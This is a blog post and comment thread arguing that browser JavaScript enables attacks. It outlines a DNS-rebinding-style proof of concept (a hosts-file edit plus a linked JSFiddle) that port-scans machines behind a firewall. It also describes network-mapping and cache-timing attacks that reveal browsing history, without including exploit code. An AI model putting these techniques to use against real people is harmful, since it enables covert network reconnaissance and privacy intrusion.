loading...

The Meltdown of the Web.

shamar profile image Giacomo Tesio Updated on ・4 min read

As Bruce Perens recently put it, I'm "just a programmer".

A humble programmer. And a self-taught one.

A programmer that has learned how to program from a weird group of people whose core value is curiosity: the hackers.

So when I see a security hole affecting in various ways billions of people, I behave like a programmer. I try to fix it... or get it fixed. As soon as possible.

So a mounth ago, I wrote an article explaining how the Web is still a DARPA weapon (that sometimes backfire, as the Russiagate shows).

There I describe two dangerous flawns of the Internet and the Web.

Once I realized that most security experts didn't understand the severity of the issue, I talked about it with a Mozilla developer that suggested to open an issue to Mozilla.

Thus I spent two hours to write a detailed bug report, but it was soon closed (without saying if the Firefox users are vulnerable to such attacks or not), because

Bugzilla is not a discussion forum.

On the suggested Lobste.rs thread (cached here), I asked if Firefox users are vulnerable to such wide class of attacks (several times) without getting a response.

Instead I got several sarcastic, condescending and even - insulting - comments.

Still, no response to such a simple question. Are Firefox users vulnerable?

When I reported the same issue to Chromium team, it was closed in less than ten minutes with the same tone:

Filing a bug here isn't the way to change web standards no matter how you feel about them.

It worth noticing here that both Mozilla and Google are WHATWG members and they write the Living Standards that we are talking about. Living Standards that basically follow the implementations.

To my money, this means that you have to fix the implementations to fix the standard... but remember, I'm just a programmer!

Now, I think I've been very clear about the wide class of attacks that JavaScript opens. When asked to, I even carefully explained how simple is to fix them.

But since

this is the Web functioning as designed

I want you to see what the Web is designed for.

PoC of one of the many possible exploits (bypassing corporate firewalls)

Please add a temporary line to your C:\Windows\System32\drivers\etc\hosts containing

127.0.0.1 local.jsfiddle.net

This mimic the control of a DNS from the attacker.

Then try this simple JSFiddle with a WHATWG browser.

You can change the port number at line 21 to test for any port on your PC.

You can change the IP in /etc/host to probe other machines on your LAN.

JSFiddle (the fictional attacker) has just bypassed your corporate firewall/proxy.

Everything is broken.

This is just one of the uncountably many attacks you can do this way.

I could go on hours inventing more attacks. And you should be able too.

EDIT: here you can find another exploit

As explained in the bug report, you can target a specific person or group.

Even over a CDN (thus through a third party site that the victim trusts).

And then you can reload an harmless script from the same url, rewriting the cache copy and removing all evidences of the attack.

It's really just a matter of compentence and fantasy.

Still I'm not going to find a cool name or draw puppets to "evangelize" about it. I'm a programmer, not a clown.

How can we fix it?

As I explained in the bug report, the technical solution is basically to

  • make users opt-in to program executions on a per-website basis
  • threat such programs as potentially dangerous

You can read a simple recap with details here.

However, what you can see here is how deeply the Web is broken.

This is not (just) about JavaScript.

This is about people.

Posted on by:

Discussion

markdown guide
 
[deleted]
 

what you're doing is boiling the whole web ecosystem to a single aspect, and then being rather aggressive with people who aren't.

Aggressive? Honestly, I do not think so.

The attack here is a quick and dirty hack that doesn't even work against all private networks, but it shows pretty well what is at stake.

And it's really just one of the possible attacks!

There's bilions of users that would get, what they would feel like, a broken web, because of an issue that will most likely never affect them.

It all depends on how good is the UI.

Many react to these solutions like if I was suggesting to let the UI unchanged. AFAIK, no standard dictates that you have to edit about:config to disable JavaScript.

And yet the UI to opt-out JavaScript is way worse than the worsts GDPR-compliance attempts I've seen so far. This is not an UI design error. This is a deliberate choice.

Turn out that such choice is a sort of "Insecurity through obscurity": most people are forced to execute code controlled by strangers because they do not know how to avoid that. AND because you could not avoid it on a web site you do not trust and allow it on one you trust.

it's not even that useful to make it opt-in, since if 99.999% of pages will give you a pop-up to opt-in, people will just learn to click it without hesitation?

You largerly overestimate the amount of web that truly need JavaScript.

The simple fact that people would have to opt-in JavaScript would drastically reduce the number of sites that use it. Web developer would start to test the web without JavaScript too, CSS and HTML would progress faster than they currently do and we would have an overall faster and safer web.

Just like the GDPR, opt-in JavaScript would improve the quality of Web.

Because a lot of people that now have NO CHOICE but to run JS, would have a choice.

Any software that gets a sizable user base becomes hard to maintain, because no issue is ever just a programming issue.

After 20 years in the field, I think I got it pretty well. ;-)

But, whenever I did an error (even expensive ones, in the early design phase) that opened a serious vulnerability for my users, I had to fix it as soon as possible. And frankly, when asked about the issue by a customer, I've always explained the issue clearly, explaining ALL the implications. I can ensure you that it has never been pleasant. But it was the ONLY thing to do.

Here Mozilla is not even saying if their users are vulnerable to this whole class of attacks.

This is the problem that, IMHO, breaks the Web.

Mozilla claims to care about user privacy. People trust them.

Calling people who do that work "clowns" is just disrespectful.

Good point. You are right.

Maybe after being called "troll" and "absurd" by people that doesn't seem to understand the issue I got a bit... "annoyed". I sincerely apologize.

Yet, I really do think that we should NOT need PR to get a severe vulnerability fixed. That's a bad sign about our entire field.

 
[deleted]

Very interesting.

Let me clarify: I think it is ridiculous (for software engineering as a whole) that we need marketing or propaganda to get a bug like heartbleed fixed. And it's even more ridiculous because it doesn't work, or... maybe... did you get a repaired processor for free?

If you didn't, you are right and I sincerely apologize to all professional clowns for comparing them to the state of our field! They are artists! They make us laugh... on purpose!

I didn't mention JS-blocking extensions (e.g. NoScript) to avoid asking you to read the bug report more carefully. Since you insist... please read the bug report more carefully. AFAIK they wouldn't prevent these attacks, unless you totally disable JavaScript everywhere. Remember, the JavaScript can be "customized" after gaining your trust! Also installing such extensions assumes you already understand the risks (that so far browsers' vendors have not admitted), while most of people do not understand them. As programmers, it's up to us to build secure software like it's up to civil engineers build safe bridges.

The same goes for HTTPS: anyone can buy a certificate, these attacks leave no evidences and they can target a single specific person among thousands users of a web site.

Now... are you going to pretend that my sarcasm here can justify the silence of Mozilla?

And honestly, I still can't see how this affects people who aren't attacked by actors with massive resources [...]

If you can't think of cheap attacks, please trust me: there's no need for massive resources.

All you need is to attract the victim on a website you control.

But even if you were right about this (and you are not), you should also consider another important aspect of this vulnerability: if you were an actual criminal you could use the mere existence of these undetectable attacks to gain plausible deniability.

Even if these attack were "only" putting users' privacy at risk (and they are not), this is something no legal system can allow.

[deleted]

Caught! :-D

Now that you called me "arrogant", you could consider to go back on the bug reports I wrote and to the related Lobste.rs thread and count how many dismissive, condescending and insulting response I got. Try to count how many time it has been said that I was trolling, how many times it has been said that I was absurd or bizarre.

Compare them with my responses.

Have I ever called someone Troll? Absurd? Bizarre?

Even read my responses to Frederik Braun that first began with "Okay, I’ll bite." and later explained me what "Turing complete" means, I just kept asking a single question: are Firefox users vulnerable to such attacks?

That's because all I care about are the people that can be damaged by these attacks.

I find it disturbing that a programmer like me doesn't have the balls to answer such an important question that affects millions of people.

Thus, sorry for my previous comment. Really.

It was intentionally abrasive just to make you understand a little how I feel.

 

The attack here is a quick and dirty hack that doesn't even work against all private networks, but it shows pretty well what is at stake.

And it's really just one of the possible attacks!

Can you provide a proof-of-concept? I read the linked articles but I'm unable to follow your logic.

You can find a quick & dirty PoC here
(very quick, it took a few minutes to write)
It shows how to discover the TCP ports open on your PC despite it being behind a firewall and a proxy. It was rapidly tested on a few networks (professionally configured by senior sysadmins) and it worked fine, but it doesn't work everywhere.

Rain1 have built a nicer exploit that leaks your private network topology here.

With a similar timing attack against the cache, you can discover if a user visited a certain 3rd party page, deducing his sexual tastes or his political orientation despite CORS, sandboxing and all other stuffs that Mozilla set up to "protect users' privacy".

The problem is that the number of exploits is potentially unbounded, it would take too much time to write them all. But if you know a little about web development, it's pretty funny to invent new ones!
Just please, add them to the bug report for future reference.

And remember: the web site or CDN can serve to a single person these malicious JS and then override them thanks to Cache Control, leaving no evidence of the attack.

The best security door cannot protect an house without walls.

Ok, it seems that we have different understanding about the terms attack and exploit.

First PoC: Updating my /etc/hosts to allow bad script doing bad things? Nope.

Second PoC: Just did not get it working.

Yes, there were a lot several cases in the past. Get the link-color of visited links in css, using css3 transparency to get your facebook-profile name ... just to name a few.

All of them were handled as serious bugs and get fixed fast.

So, if you have a bug and you can demonstrate it, nice. If you want to discuss things, then I think here is the right place I guess.

After writing this: I still have a different opinion on this topic and think it's wrong to blame Mozilla. They proved in the past often times, that they value privacy and security.

First PoC: Updating my /etc/hosts to allow bad script doing bad things? Nope.

Yes we have very different understanding of network security.

Do you know what DNS rebinding is?

I hope Mozilla know them.
Actually I hope Mozilla developers can deduce at least all the attacks I can conceive from the description I wrote in the bug report.

Second PoC: Just did not get it working.

The fact that it does not work on your specific machine/network doesn't mean much.

It's a proof-of-concept. It works. Tweak it a little.

Rain1 even explained carefully how it works.

After writing this: I still have a different opinion on this topic and think it's wrong to blame Mozilla. They proved in the past often times, that they value privacy and security.

As I wrote in the thread suggested by Mozilla to discuss the issue (now censored on Lobste.rs) I used to trust them too.

But I do not trust them anymore. That's just empty marketing.

To prove me wrong, to prove they deserve the trust of their users, there's just one thing they have to do: tell everybody the answer to this question:

Are Firefox users vulnerable to the wide class of attacks described in that bug report?

People deserve the same answer from Google, Microsoft and Apple, but at least they do not blether that they care about users' privacy.

Exactly this vulnerability is why we try to get Freenet users to use Freenet as proxy with random local IP (127.x.y.z) and PORT.

That way an attacker needs roughly 200 billion requests on average to find the local service (using only 5001..32000 as ports, because they are sure not to be ephemeral).

See d6.gnutella2.info/freenet/USK@sUm3...

 

I think linking to your long article (which has a mix of other non-bug-specific content) is a bad start for your bug report. It is rather difficult, or at least for me, to follow your argument while it is weaved in between two seemingly related paragraphs. The article also does not contain the "Steps to reproduce", unlike your PoC in this dev.to article. It would be nicer to provide the PoC or some other methods to reproduce the bug for others to hunt the bug.

When dealing with CDN, I believe a subsource integrity attribute can prevent backstabbing from CDN providers, as the scripts' integrity would be checked by the browser first before execution. As for the DNS exploit, HTTPS should be a good measure against the man-in-the-middle attack, hindering swapping or tampering of scripts (Firefox and Chrome address this well). The DNS problem mostly falls to ISPs and regulation against them, browsers has little power here.
I'm also a humble programmer, please correct if I'm wrong.🤝

 

Good objections. Let me widen the perspective to explain my reasoning.

Technology is the continuation of Politics by other means.

(a full explanation would take a whole article about hackers' ethics, curiosity, humanity and love...)

To my eyes the original Medium post describes a few legal and geopolitical issues that are at least as dreadful as the attack you see here. I thought it was important to read them for Mozilla developers, to understand what a dangerous threat is JavaScript outside of the US not just to users' privacy and security, but to free speech.

The Medium article itself was not written for programmers, but for laymen. Yet the JavaScript attacks were described with enough details to make a competent web developer aware of the risks. At least that was my intending.

There are too many PoC to write

I described the bug as "Arbitrary Remote Code Execution" because I cannot stop thinking more ways these bugs can be exploited against people and companies. I do not know if there is a better definition in InfoSec that match these attacks, but I was unable to find one.

I couldn't write the "Steps to reproduce" because there are too many ways to exploit JavaScript. And if I had the time to write all PoC, I would use it to strip JavaScript from Firefox. Even worse: WHATWG members would try to stack patch over patch to avoid each single exploit, without fixing the core issue.

Actually I was convinced by a smart guy to write a PoC, since I considered it a waste of time. If the guys that closed these issues at Mozilla and Google were unable to foresee these exploits from the description I wrote, we have a huge problem. But I think they did actually understand the issue pretty well, they just don't want/don't care to fix it, despite the risks for their users.

CDN and SRI

Sure they can be used to mitigate the risks. But they are not enough and they should be mandatory.

DNS

As far as I know, the DNS roots have been target of several successful DDoS already.

I do not like DNS-over-HTTPS for several reasons, but

  • the attack here would work anyway (even CloudFlare would have to resolve local.jsfiddle.net and the compromised DNS would return 127.0.0.1)
  • the US attack described on Medium is made even more powerful: there are 13 DNS roots, there is only one CloudFlare
 

was reading your post, and i had to sign up just to agree with you, and say <3 the von Clausewitz para-quote.
hadnt tried jehanne (more of a 9ants zealot :P) but will have to try now... well tomorrow.

 

The web is broken because it is a half-hearted, incomplete implementation of Xanadu.